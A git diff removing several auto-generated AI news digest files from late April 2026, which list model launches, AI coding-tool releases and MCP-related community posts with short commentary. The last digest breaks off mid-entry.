-*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent wants to post about the tension between Cursor being built on open-source VS Code and its $60 billion valuation. The debate gets at fundamental questions about value creation in the AI era. - ---- - -## [Crush v0.62.0 released](https://github.com/charmbracelet/crush/releases/tag/v0.62.0) -*GitHub Releases · Crush* | 22/04/2026 | Score: 0.94 -Tags: product_launch - -> # 98% reduction in token usage You read it right. We made changes to our system prompt, in particular regarding tools, to vastly reduce how many tokens use by default. ## Small system prompt This was announced on [v0.57.0](https://github.com/charmbracelet/crush/releases/tag/v0.57.0) as a preview feature, and now we're making it the default. Crush used to have long descriptions for tools with instruction on how to use them. Turns out that models got a lot better with time, and now the - ---- - -## [GitHub CLI now collects pseudoanonymous telemetry](https://cli.github.com/telemetry) -*Hacker News* | 22/04/2026 | Score: 0.91 -Tags: cli_tool - ---- - -## [[AINews] OpenAI launches GPT-Image-2](https://www.latent.space/p/ainews-openai-launches-gpt-image) -*Latent Space* | Score: 0.90 -Tags: product_launch - ---- - -## [Google unveils two new TPUs designed for the “agentic era”](https://arstechnica.com/ai/2026/04/google-unveils-two-new-tpus-designed-for-the-agentic-era/) -*Ars Technica AI* | Score: 0.82 -Tags: product_launch - ---- - -## [Prisma 7.8.0 released](https://github.com/prisma/prisma/releases/tag/7.8.0) -*GitHub Releases · Prisma* | 22/04/2026 | Score: 0.78 -Tags: product_launch - -> Today, we are excited to share the `7.8.0` stable release 🎉 **🌟 Star this repo for notifications about new releases, bug fixes & features — or [follow us on X](https://pris.ly/x)!** # Highlights ## ORM ### Features **Prisma Client** - Added a `queryPlanCacheMaxSize` option to the `PrismaClient` constructor for fine-grained control over the query plan cache. Pass `0` to disable the cache entirely, or omit it to use the default cache size. A larger value can improve performance - ---- - diff --git a/data/digest-2026-04-23.md b/data/digest-2026-04-23.md deleted file mode 100644 index c489dce..0000000 --- a/data/digest-2026-04-23.md +++ /dev/null @@ -1,103 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-23** | 13 stories | Auto-generated from 167 archived stories - ---- - -## [Gemini CLI v0.39.0 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.0) -*GitHub Releases · Gemini CLI* | 23/04/2026 | Score: 0.86 -Tags: cli_tool, tool_update - -> ## What's Changed * refactor(plan): simplify policy priorities and consolidate read-only rules by @ruomengz in https://github.com/google-gemini/gemini-cli/pull/24849 * feat(test-utils): add memory usage integration test harness by @sripasg in https://github.com/google-gemini/gemini-cli/pull/24876 * feat(memory): add /memory inbox command for reviewing extracted skills by @SandyTao520 in https://github.com/google-gemini/gemini-cli/pull/24544 * chore(release): bump version to 0.39.0-nightly.202604 - ---- - -## [Google Cloud launches two new AI chips to compete with Nvidia](https://techcrunch.com/2026/04/22/google-cloud-next-new-tpu-ai-chips-compete-with-nvidia/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch - ---- - -## [OpenAI Just Made ChatGPT a Team Sport](https://x.com/eddiboi/status/2047009433255854119) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: tool_update - -> OpenAI launched Workspace Agents in ChatGPT, enabling shared agents for teams. Braygent's take: this is ChatGPT becoming enterprise infrastructure. - ---- - -## [Anthropic Just Sent a Fleet of Bug Hunters Into Your Code](https://x.com/AIRoboticsInt/status/2047012029169324532) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: tool_update - -> Claude Code launched /ultrareview, sending a fleet of bug-hunting agents into your codebase. Braygent's take: this is autonomous code review at scale. - ---- - -## [Character.AI Finally Remembers You](https://x.com/character_ai/status/2047030699417571565) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: tool_update - -> Character.AI launched Memory, allowing AI characters to remember users across conversations. Braygent's take: this transforms Character.AI from a novelty into something genuinely relational. - ---- - -## [Kimi K2.6 Is a 1 Trillion Parameter Open Model and It Is Live Right Now](https://x.com/replicate/status/2047027042781106649) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: open_source - -> Kimi K2.6, a 1 trillion parameter open model, is live on Replicate. Braygent's take: the open model ecosystem is not catching up to closed models, it is arriving. - ---- - -## [One OAuth Token Brought Down Vercel, GitHub, and npm](https://x.com/Obots_ai/status/2046952458207838375) -*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 -Tags: cli_tool - -> The Vercel breach came from one OAuth token from a breached AI tool, giving access to internal systems, GitHub, and npm. Braygent's take: audit your OAuth tokens today. - ---- - -## [Introducing the Bright Data CLI for Automated Web Data Pipelines 3 days ago • 3](https://huggingface.co/blog/BrightData/bright-data-cli-hf-integration) -*Hugging Face Blog* | Score: 0.86 -Tags: cli_tool - ---- - -## [OpenAI's response to the Axios developer tool compromise](https://openai.com/index/axios-developer-tool-compromise/) -*Hacker News* | 23/04/2026 | Score: 0.82 -Tags: developer_tool - ---- - -## [Amuse V3.3.3 Pre-release Available.](https://reddit.com/r/StableDiffusion/comments/1st47p1/amuse_v333_prerelease_available/) -*Reddit r/StableDiffusion* | 23/04/2026 | Score: 0.78 -Tags: product_launch - -> Amuse V3.3.3 Pre-release is now available. 4.0 release coming in July. [https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3](https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3) V3.3.3 is NOT COMPATIBLE with previous versions of Amuse 3.0 and below, you will need to fully uninstall Amuse and the models also. Essentially Amuse and Diffuse were two separate projects, Amuse being ONNX based, and Diffuse being diffusers based. Diffuse is being merged into Amuse and everything - ---- - -## [Goose v1.32.0 released](https://github.com/aaif-goose/goose/releases/tag/v1.32.0) -*GitHub Releases · Goose* | 23/04/2026 | Score: 0.76 -Tags: api_update - -> ## ✨ Features - Exa AI-powered search tool [#8487](https://github.com/aaif-goose/goose/pull/8487) - Desktop notification when goose finishes a task [#8647](https://github.com/aaif-goose/goose/pull/8647) - @agent mention support in chat [#8571](https://github.com/aaif-goose/goose/pull/8571) - `/skills` command [#8600](https://github.com/aaif-goose/goose/pull/8600) - Associate threads with projects [#8745](https://github.com/aaif-goose/goose/pull/8745) - Auto-compaction for goose2 context window - ---- - -## [Qwen Code v0.15.1 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.1) -*GitHub Releases · Qwen Code* | 23/04/2026 | Score: 0.62 -Tags: cli_tool - -> ## What's Changed * fix(core): scope StreamingToolCallParser per stream, not per Converter (#3516) by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3525 * feat(cli): combine elapsed + timeout in shell time indicator by @wenshao in https://github.com/QwenLM/qwen-code/pull/3512 * fix(cli): stop slash completion render loop by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3533 * chore: bump version to 0.15.1 by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3541 **Full C - ---- - -## [Last week in Generative Image & Video](https://reddit.com/r/StableDiffusion/comments/1st8aux/last_week_in_generative_image_video/) -*Reddit r/StableDiffusion* | 23/04/2026 | Score: 0.54 -Tags: open_source - -> I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week: * Motif-Video 2B * Open-source 2B DiT, 720p at 121 frames, one checkpoint for both T2V and I2V. * 83.76% on VBench Total, highest among open-source, beats Wan2.1-14B at 7x fewer parameters. Caveat: Wan2.1-14B still wins on temporal stability and fine human anatomy in blind tests. * [Hugging Face](https://huggingface.co/Motif-Technologies/Motif-Video-2B) https://reddit.com - ---- - diff --git a/data/digest-2026-04-25.md b/data/digest-2026-04-25.md deleted file mode 100644 index 75d068b..0000000 --- a/data/digest-2026-04-25.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-25** | 15 stories | Auto-generated from 689 archived stories - ---- - -## [Stop switching tabs for prompting. I built a local MCP bridge to orchestrate Gemini 3.1 and Claude while you diffuse](https://reddit.com/r/StableDiffusion/comments/1svmskn/stop_switching_tabs_for_prompting_i_built_a_local/) -*Reddit r/StableDiffusion* | 25/04/2026 | Score: 1.00 -Tags: mcp, open_source - -> If you’re like me, your workflow is basically: generating an image in ComfyUI, realizing the prompt needs better structure, switching to Claude/Gemini for brainstorming, then copy-pasting back and forth. It’s a flow-killer, especially when you’re deep into a creative session. I built [**Proxima**](https://github.com/Zen4-bit/Proxima) to handle this. It’s an open-source MCP bridge that lets you bring the logic of Claude, Gemini, GPT, and Perplexity directly into your local environment. Instead o - ---- - -## [Signal Loom — node-based AI media studio with a built-in timeline editor (open source, AGPL)](https://reddit.com/r/StableDiffusion/comments/1sv0ilf/signal_loom_nodebased_ai_media_studio_with_a/) -*Reddit r/StableDiffusion* | 25/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> I built Signal Loom because I was tired of generating assets in one tool and then exporting/importing into another just to edit them. It's a node-based workflow canvas (React Flow) for chaining generative AI tasks—text, image, video, audio—connected to your own API keys (Gemini, OpenAI, ElevenLabs, Hugging Face). Downstream nodes automatically consume upstream context. When you're done generating, you switch to a timeline editor: multi-track, keyframes, cuts, opacity, transform, volume, text ove - ---- - -## [Qwen Code v0.15.2 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.2) -*GitHub Releases · Qwen Code* | 24/04/2026 | Score: 0.94 -Tags: mcp, cli_tool - -> ## What's Changed * fix(core): treat empty 'pages' parameter as unset in ReadFile by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3559 * feat(session): auto-title sessions via fast model, add /rename --auto by @wenshao in https://github.com/QwenLM/qwen-code/pull/3540 * fix(i18n): sync mismatched keys between en.js and zh.js by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3534 * fix(cli): remove residual blank lines after MCP init completes by @BZ-D in https://github.com/Qwe - ---- - -## [Built an agent-to-agent payment system with Claude — here's what I learned and why I think agents need their own economy (e.g., pet food)](https://reddit.com/r/ClaudeAI/comments/1svgba2/built_an_agenttoagent_payment_system_with_claude/) -*Reddit r/ClaudeAI* | 25/04/2026 | Score: 0.86 -Tags: mcp, agent_tool - -> I built Coyns with Claude over the past several months. It's a virtual currency system designed specifically for AI agent-to-agent transactions — MCP-native, Ed25519-authenticated, with a wallet, payment rails, escrow deals, and a gaming layer (Playce.ai) where agents wager and compete. Agents can register and start earning free Gold — the base currency agents earn through activity — with no purchase required. The beta is open now and free to join at coyns.com. What Claude helped me bu - ---- - -## [Gemini CLI v0.39.1 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.1) -*GitHub Releases · Gemini CLI* | 24/04/2026 | Score: 0.70 -Tags: cli_tool, tool_update - -> **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.39.0...v0.39.1 - ---- - -## [Claude estimates work in human time, not Claude time](https://reddit.com/r/ClaudeAI/comments/1sv8avi/claude_estimates_work_in_human_time_not_claude/) -*Reddit r/ClaudeAI* | 25/04/2026 | Score: 0.62 -Tags: developer_tool, cli_tool - -> Whenever I ask Claude to plan a chunk of work, it comes back with wildly long timelines. For example, adding a feature to a CLI framework I'm working on got estimated at **1-2 days**, but in reality, Claude Code one-shots it in a few minutes. Sometimes it even estimates weeks or months for more complex work, and Claude Code is able to complete it (with my input and guidance) in a few hours. I get it's probably because it was trained on estimates made by humans, but that feels weird and it alwa - ---- - -## [Crush v0.62.1 released](https://github.com/charmbracelet/crush/releases/tag/v0.62.1) -*GitHub Releases · Crush* | 24/04/2026 | Score: 0.62 -Tags: api_update, open_source - -> # Stability release Open Source :tm: is all about community, and this release got some nice contributions from our loved users! ## MiniMax fix Crush wasn't allowing users to _some_ MiniMax API keys, but now all keys should work. For context, MiniMax does not have an endpoint to validate API keys. We were checking they at least start with `sk-`, but not all keys from MiniMax have this prefix. Kudos to @flynn-eye for the help with this one! ## Fantasy fix @carsonfarmer made [ - ---- - -## [Andrej Karpathy's 262-Minute Masterclass on AI Agents Is the Weekend Watch You Need](https://x.com/karpathy) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: mcp - -> Andrej Karpathy's 262-minute YouTube masterclass on AI agents, Claude Skills, and MCP servers is being called essential viewing for anyone building with AI tools. - ---- - -## [AI Agent Team Finds Drugs Targeting Cell-Type-Specific Genes Are 40% More Likely to Succeed](https://x.com/ayirpelle/status/2029840518272975205) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: agent_tool - -> A team of AI agents discovered that drugs targeting cell-type-specific genes are 40% more likely to succeed in clinical development, providing a new principle for drug target prioritization. - ---- - -## [GPT-5.5 Is Now in the API — 38.4% on APEX-Agents vs 1.1% Two Years Ago](https://x.com/mercor_ai/status/2047859197593911522) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: api_update - -> GPT-5.5 hits the API with APEX-Agents benchmark jumping from 1.1% (GPT-4o) to 38.4%, representing 35+ points of improvement in under two years. - ---- - -## [ComfyUI Raises $30M at $500M Valuation — Open Source Wins Again](https://x.com/GrishinRobotics/status/2047760472204546230) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: open_source - -> ComfyUI raises $30M at $500M valuation, validating open source AI creative tools as serious infrastructure worth funding at startup scale. - ---- - -## [Sakana AI Launches Fugu — Multi-Agent Orchestration Is the Next Platform War](https://x.com/SakanaAILabs/status/2047849392808624332) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: product_launch - -> Sakana AI launches Fugu beta for multi-agent orchestration, betting that collective intelligence AI will define the next platform war. - ---- - -## [@Scobleizer Grok Can't Read X Lists — His AI Can, Key Capability Gap](https://x.com/Scobleizer/status/2047736381162901665) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: tool_update - -> Scoble notes Grok can't read X lists while his AI can, highlighting that platform integration is as important as raw model capability for practical AI utility. - ---- - -## [@NousResearch Hermes Agent AMA on r/LocalLLaMA — April 29, Direct Competition with OpenClaw](https://x.com/NousResearch/status/2047840294406627659) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: product_launch - -> Nous Research announces a Hermes Agent AMA on r/LocalLLaMA for April 29, 8-11am PST, with strong community interest in the OpenClaw competitor. - ---- - -## [@jxnlco Codex Computer Use Completes Full Financial Workflow — Signs PDF, Submits to Schwab](https://x.com/jxnlco/status/2047874586310766864) -*Aligned News (Scoble)* | 25/04/2026 | Score: 1.00 -Tags: agent_tool - -> Codex Computer Use completes a full financial workflow autonomously, signing a PDF with Dropbox Sign and submitting to Schwab, raising the bar for AI agent platforms. - ---- - diff --git a/data/digest-2026-04-26.md b/data/digest-2026-04-26.md deleted file mode 100644 index d9786e3..0000000 --- a/data/digest-2026-04-26.md +++ /dev/null @@ -1,127 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-26** | 15 stories | Auto-generated from 311 archived stories - ---- - -## [I built a free package manager for Claude Code MCP servers (open source)](https://reddit.com/r/ClaudeAI/comments/1sw77bg/i_built_a_free_package_manager_for_claude_code/) -*Reddit r/ClaudeAI* | 26/04/2026 | Score: 1.00 -Tags: api_update, mcp, open_source, developer_tool, cli_tool - -> **What I built** Every time I wanted to add an MCP server to Claude Code I was doing the same thing: find the npm package, figure out the config format, manually edit \`\~/.claude.json\`, restart. So I built **cgcone** to make it one command. `npm install -g @cgcone``/cli` `cgcone install context7` `cgcone install brave-search` That's it. It detects Claude Code, writes the config, and prompts for any API keys with masked input — no manual JSON editing. **How Claude Code - ---- - -## [GPT-5.5 launched — OpenAI's biggest agentic model yet is live in ChatGPT and Codex](https://x.com/OpenAIDevs/status/2047377292981383662) -*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 -Tags: api_update, tool_update, agent_tool - -> GPT-5.5 launched this week and OpenAI called it a step change. It is now live in ChatGPT, Codex, and the API, optimized for agentic coding and multi-step tasks. - ---- - -## [I built an MCP server (with Claude Code) that tells you the blast radius of a code change, its free, open source, and open to feedback](https://reddit.com/r/ClaudeAI/comments/1sw4dqr/i_built_an_mcp_server_with_claude_code_that_tells/) -*Reddit r/ClaudeAI* | 26/04/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> I built **Impact Graph MCP** using Claude Code. It’s an MCP server that does AST-based impact analysis for TypeScript codebases, so Claude can tell you things like *“if I rewrite* `loginUser`*, what else breaks?”* **What it does:** You give it a function name, file path, or module, and it returns: * Direct and indirect dependents * Risk score (0–100) and risk factors * Which system layers are affected (API, auth, frontend, etc.) * Decision-oriented guidance: recommended strategy, suggested t - ---- - -## [DeepSeek V4 Pro is the #1 open weights model — open source is not losing the AI race](https://x.com/ArtificialAnlys/status/2047547434809880611) -*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 -Tags: open_source, tool_update - -> DeepSeek V4 Pro launched this week and immediately became the number one open weights model on the GDPval-AA agentic benchmark. Open source is not losing the AI race. - ---- - -## [Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to proje…](https://x.com/AmaniBisimwa4/status/2048370790333046822) -*X / @amanibisimwa4* | 26/04/2026 | Score: 1.00 -Tags: mcp, agent_tool - -> Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to project context. Thanks to everyone who joined - ---- - -## [Built an Open Source Tool that reduces token usage by ~94% for initial context building for Coding Agents.](https://reddit.com/r/ClaudeAI/comments/1swbkvk/built_an_open_source_tool_that_reduces_token/) -*Reddit r/ClaudeAI* | 26/04/2026 | Score: 0.86 -Tags: mcp, open_source - -> I've been using claude code daily and kept hitting the same wall, it would spend the first few messages just re-exploring ,my codebase. files it had already seen. every. single. session. I measured it one day , 27,292 tokens before it wrote a single line of code, so I built **Fullerenes** `npx fullerenes init` maps your codebase into a local sqlite graph. agents query it over MCP instead of reading raw files from scratch. 27,292 → 919 tokens. same understanding. It has several oth - ---- - -## [GPT-5.5 is now available in the API. - -The model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries.](https://x.com/OpenAIDevs/status/2047742566410736090) -*X / @openaidevs* | 24/04/2026 | Score: 0.86 -Tags: api_update, product_launch - -> GPT-5.5 is now available in the API. The model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries. - ---- - -## [huggingface/ml-intern: 🤗 ml-intern: an open-source ML engineer that reads papers, trains models, and ships ML models](https://reddit.com/r/StableDiffusion/comments/1swctgr/huggingfacemlintern_mlintern_an_opensource_ml/) -*Reddit r/StableDiffusion* | 26/04/2026 | Score: 0.78 -Tags: open_source, tool_update - -> This looks interesting. This is a quick summary according to Gemini: "Think of ML Intern as a "junior machine learning engineer" that lives inside your computer. While a standard AI (like ChatGPT) can give you advice or write a small snippet of code, ML Intern actually does the work from start to finish. It’s an "agent," meaning it doesn't just talk; it takes action. What it actually does for you: Reads the "Homework": If you tell it to use a new technique from a scientific paper, it will - ---- - -## [Cloudflare just shipped enterprise MCP governance, is this where the industry is heading or does nobody care](https://reddit.com/r/ClaudeAI/comments/1sw4zmj/cloudflare_just_shipped_enterprise_mcp_governance/) -*Reddit r/ClaudeAI* | 26/04/2026 | Score: 0.78 -Tags: api_update, mcp - -> Cloudflare wrapped Agents Week last week. The enterprise MCP stuff caught my eye. They shipped MCP server portals that aggregate multiple upstream servers behind Cloudflare Access auth. Code Mode collapses thousands of API endpoints into two tools (search and execute) running in a sandboxed Worker, dropping context costs by 99.9%. AI Gateway sits between MCP clients and model providers for usage tracking. Shadow MCP detection got added to Cloudflare Gateway as a category to watch. What I can't - ---- - -## [Most image managers suck for AI. I built AURA: A local-first Vault for 'AI Hoarders' with Civitai integration, Vision Tagging, Aesthetic Grading, and more!](https://reddit.com/r/StableDiffusion/comments/1swck8j/most_image_managers_suck_for_ai_i_built_aura_a/) -*Reddit r/StableDiffusion* | 26/04/2026 | Score: 0.70 -Tags: open_source, tool_update - -> **GitHub Link (Free & Open Source):** [https://github.com/TheGho7t/AURA-AI-Studio-Vault](https://github.com/TheGho7t/AURA-AI-Studio-Vault) Be sure to check out all of the other details and images on the GitHub page. Hey everyone. As a self-proclaimed AI hoarder, I was tired of losing my prompts and forgetting what my LoRAs even did. Existing image managers didn't quite do what I needed, so I built **AURA** **AI Studio Vault**. A few things it does: * **One-Click Import:** Use the include - ---- - -## [OpenClaw vs Hermes — the agent framework war is the most important battle in AI tooling right now](https://x.com/LoicBerthelot/status/2047690512199540959) -*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 -Tags: developer_tool - -> The battle between OpenClaw (345K+ GitHub stars) and Hermes (100K stars in 7 weeks) is the most important competition in AI tooling. Hermes wins on learning and memory. OpenClaw wins on adoption. Mercury is trying to combine both. - ---- - -## [AI agent burnout is real — what it means for careers in an AI-augmented workplace](https://x.com/Chengdavid923/status/2048451643298218069) -*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 -Tags: agent_tool - -> The emerging phenomenon of AI agent burnout among young ambitious workers has implications for how companies should structure AI-augmented work and what sustainable AI-human collaboration looks like. - ---- - -## [GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:/…](https://x.com/genxproapp/status/2048454195716497743) -*X / @genxproapp* | 26/04/2026 | Score: 1.00 -Tags: mcp - -> GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:// genx.pro/latest One app. - ---- - -## [Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up:](https://x.com/FSEvolved/status/2048447077705830600) -*X / @fsevolved* | 26/04/2026 | Score: 1.00 -Tags: api_update - -> Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up: - ---- - -## [United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical repor…](https://x.com/H_Mhatre_/status/2048359364902170792) -*X / @h_mhatre_* | 26/04/2026 | Score: 1.00 -Tags: open_source - -> United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical reporting benchmarks. - ---- - diff --git a/data/digest-2026-04-27.md b/data/digest-2026-04-27.md deleted file mode 100644 index d04527e..0000000 --- a/data/digest-2026-04-27.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-27** | 15 stories | Auto-generated from 683 archived stories - ---- - -## [(Open Source) AURA: A Local-First Management Vault for Civitai - Auto-tagging, Metadata and Browser Integration - Version 1.0.1 Fixes](https://reddit.com/r/StableDiffusion/comments/1sx98ch/open_source_aura_a_localfirst_management_vault/) -*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.94 -Tags: product_launch, open_source, github_release, tool_update - -> **GitHub Link:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault**](https://github.com/TheGho7t/AURA-AI-Studio-Vault) **Latest Release:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1**](https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1) I resolved an obvious mistake causing images and models not to be rated General by default. I also fixed an issue regarding what type of model (Lora, Checkpoint, Dora, etc...) being displayed. It had bee - ---- - -## [Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. Alibaba's bigges…](https://x.com/bridgemindai/status/2048816878454194460) -*X / @bridgemindai* | 27/04/2026 | Score: 1.00 -Tags: api_update, open_source, agent_tool - -> Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. Alibaba's biggest model ever. And it costs less - ---- - -## [A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claud…](https://x.com/0xAirr/status/2048663698806620544) -*X / @0xairr* | 27/04/2026 | Score: 1.00 -Tags: api_update, mcp, cli_tool - -> A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claude mcp list You should see Surf MCP - ---- - -## [how to build a persistent memory layer like recall?](https://reddit.com/r/ClaudeAI/comments/1swyzvc/how_to_build_a_persistent_memory_layer_like_recall/) -*Reddit r/ClaudeAI* | 27/04/2026 | Score: 1.00 -Tags: api_update, mcp - -> I've been testing recall 2.0 and their context layer is exactly what i want. it sits outside the chat, ingests all my github repos and web research, and then feeds the exact right context into claude when i ask a question. i want to build my own version of this using the mcp protocol so i don't have to pay for another subscription. what's the best vector database and orchestration setup to replicate this? my current python script just dumps way too much junk into the context window and confuse - ---- - -## [it’s been a good run... rip my stable diffusion setup (+ Raven fanart)](https://reddit.com/r/StableDiffusion/comments/1sx30ke/its_been_a_good_run_rip_my_stable_diffusion_setup/) -*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.94 -Tags: api_update, tool_update - -> i've been a stable diffusion user since march 2023, but sadly my journey ended last june 2025. it's been a struggle since python got updated in sagemaker and the api i was renting got way too greedy, they even removed the free features for http tunneling services. on top of that, kaggle keeps banning my accounts if you try to generate any woman pictures, and google colab basically moved everything behind the pro version. it's getting harder and harder to find a good spot to build. anyway, i wa - ---- - -## [Built an MCP connector for official Python docs .. no API keys, no unofficial sources](https://reddit.com/r/ClaudeAI/comments/1sx2u3s/built_an_mcp_connector_for_official_python_docs/) -*Reddit r/ClaudeAI* | 27/04/2026 | Score: 0.86 -Tags: api_update, mcp - -> I built an MCP server for Python stdlib docs with one goal: make it easy to defend in a company environment. [https://github.com/ayhammouda/python-docs-mcp-server](https://github.com/ayhammouda/python-docs-mcp-server) The core idea is simple. Instead of going through third-party APIs or unofficial doc sources, it connects MCP clients to the official Python docs. I built it because this is where good tooling usually gets stuck. In a solo setup, everything looks fine. In a company, security and - ---- - -## [OpenClaw v2026.4.25 released](https://github.com/openclaw/openclaw/releases/tag/v2026.4.25) -*GitHub Releases · OpenClaw* | 27/04/2026 | Score: 0.78 -Tags: developer_tool, cli_tool - -> ## 2026.4.25 ### Highlights - Voice replies get a full TTS upgrade: `/tts latest`, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, @xuruiray, @itsuzef, and @barronlroth. - Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discov - ---- - -## [Built a open-source local music video generator using SDXL + AnimateDiff + audio-reactive GLSL shaders](https://reddit.com/r/StableDiffusion/comments/1swx934/built_a_opensource_local_music_video_generator/) -*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.78 -Tags: open_source, tool_update - -> I needed visuals for AI-generated tracks, so I built Glitchframe, a pipeline that takes an audio file and produces a full music video using SDXL keyframe stills or AnimateDiff motion, with GLSL shaders that react to beat/onset/spectrum data in real time. Stack: SDXL for backgrounds, optional AnimateDiff (fair warning: \~20 GB VRAM), Skia for kinetic typography, WhisperX for word-level lyric sync, FFmpeg NVENC for encode. UI runs in Gradio locally. AnimateDiff integration was the most painful p - ---- - -## [PixlStash 1.1.0 is now available!](https://reddit.com/r/StableDiffusion/comments/1sx8khw/pixlstash_110_is_now_available/) -*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.70 -Tags: product_launch, open_source - -> [PixlStash](https://pixlstash.dev) is a locally hosted, open source, picture management server for organising, filtering, tagging and reviewing large image collections. The main target for version 1.1.0 was to support existing self-organised reference folders, so you can index, tag and include pictures from folders you've carefully organised yourself. But there are some more features as well: * Automatic import folders in the UI along with the reference folders * Statistics sidebar that shows - ---- - -## [Is anyone working on a ComfyUI node for the new Ideogram LoRA API? (They call it Custom Model)](https://reddit.com/r/StableDiffusion/comments/1sxh6ir/is_anyone_working_on_a_comfyui_node_for_the_new/) -*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.62 -Tags: api_update, developer_tool - -> I've been playing around with the new Ideogram LoRA training feature just to test it out. I trained a LoRA on the [Loomies illustration library](https://getillustrations.com/illustration-pack/loomies-free-vector-illustrations), and the way it gets all the details right and handles text generation is honestly flawless. 😀 But, I do 99% of my actual work locally and hate leaving my node setups. Has anyone seen (or started building) a custom node to pull their API into ComfyUI yet? I'd love to be - ---- - -## [NVIDIA Sonic Makes Humanoid Robots Cheap — Open Source Forever](https://x.com/JoseCSancho/status/2048587841882439784) -*Aligned News (Scoble)* | 27/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent's take: NVIDIA Sonic is the moment humanoid robotics becomes accessible to startups. The economics changed permanently today. - ---- - -## [NVIDIA Kimodo — Motion Diffusion for Humanoid Robots Trained on 700 Hours of Mocap](https://x.com/AIKumarvels/status/2048294442063970777) -*Aligned News (Scoble)* | 27/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent's take: NVIDIA Kimodo plus Sonic gives humanoid developers a complete open 